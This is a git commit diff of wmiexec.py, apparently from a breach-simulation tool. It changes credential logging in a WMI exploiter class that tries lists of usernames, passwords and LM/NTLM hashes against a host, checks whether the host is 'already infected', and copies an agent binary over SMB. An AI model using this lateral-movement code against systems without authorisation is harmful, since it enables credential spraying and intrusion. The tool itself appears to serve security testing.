Agent: improve logging in wmiexec.py
This commit is contained in:
vakarisz
parent
af9736a8ea
commit
d7e222c8a8
|
|
@ -2,6 +2,7 @@ import logging
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
import traceback
|
import traceback
|
||||||
|
from typing import List
|
||||||
|
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
|
||||||
|
|
@ -26,25 +27,12 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
@WmiTools.dcom_wrap
|
@WmiTools.dcom_wrap
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
src_path = get_target_monkey(self.host)
|
|
||||||
|
|
||||||
if not src_path:
|
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
|
||||||
return False
|
|
||||||
|
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||||
|
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
password_hashed = self._config.hash_sensitive_data(password)
|
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
||||||
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
|
logger.debug(f"Attempting to connect to {self.host} using WMI with {creds_for_log}")
|
||||||
ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
|
|
||||||
creds_for_logging = (
|
|
||||||
"user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): "
|
|
||||||
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed)
|
|
||||||
)
|
|
||||||
logger.debug(
|
|
||||||
("Attempting to connect %r using WMI with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
|
|
||||||
wmi_connection = WmiTools.WmiConnection()
|
wmi_connection = WmiTools.WmiConnection()
|
||||||
|
|
||||||
|
|
@ -52,26 +40,21 @@ class WmiExploiter(HostExploiter):
|
||||||
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
||||||
except AccessDeniedException:
|
except AccessDeniedException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
logger.debug(
|
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||||
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
continue
|
continue
|
||||||
except DCERPCException:
|
except DCERPCException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
logger.debug(
|
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||||
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
continue
|
continue
|
||||||
|
|
||||||
except socket.error:
|
except socket.error:
|
||||||
logger.debug(
|
logger.debug(f"Network error in WMI connection to {self.host}")
|
||||||
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
("Unknown WMI connection error to %r with " % self.host)
|
f"Unknown WMI connection error to {self.host}: "
|
||||||
+ creds_for_logging
|
f"{exc} {traceback.format_exc()}"
|
||||||
+ (" (%s):\n%s" % (exc, traceback.format_exc()))
|
|
||||||
)
|
)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
@ -82,7 +65,7 @@ class WmiExploiter(HostExploiter):
|
||||||
wmi_connection,
|
wmi_connection,
|
||||||
"Win32_Process",
|
"Win32_Process",
|
||||||
fields=("Caption",),
|
fields=("Caption",),
|
||||||
where="Name='%s'" % ntpath.split(src_path)[-1],
|
where="Name='{0}'".format(self.options["dropper_target_path_win_64"]),
|
||||||
)
|
)
|
||||||
if process_list:
|
if process_list:
|
||||||
wmi_connection.close()
|
wmi_connection.close()
|
||||||
|
|
@ -90,11 +73,12 @@ class WmiExploiter(HostExploiter):
|
||||||
logger.debug("Skipping %r - already infected", self.host)
|
logger.debug("Skipping %r - already infected", self.host)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# copy the file remotely using SMB
|
downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
|
||||||
|
|
||||||
remote_full_path = SmbTools.copy_file(
|
remote_full_path = SmbTools.copy_file(
|
||||||
self.host,
|
self.host,
|
||||||
src_path,
|
downloaded_agent,
|
||||||
self._config.dropper_target_path_win_32,
|
self.options["dropper_target_path_win_64"],
|
||||||
user,
|
user,
|
||||||
password,
|
password,
|
||||||
lm_hash,
|
lm_hash,
|
||||||
|
|
@ -153,3 +137,15 @@ class WmiExploiter(HostExploiter):
|
||||||
return success
|
return success
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def _get_credential_string(creds: List) -> str:
|
||||||
|
cred_strs = [
|
||||||
|
(creds[0], "username"),
|
||||||
|
(creds[1], "password"),
|
||||||
|
(creds[2], "lm hash"),
|
||||||
|
(creds[3], "nt hash"),
|
||||||
|
]
|
||||||
|
|
||||||
|
present_creds = [cred[1] for cred in cred_strs if cred[0]]
|
||||||
|
return ", ".join(present_creds)
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue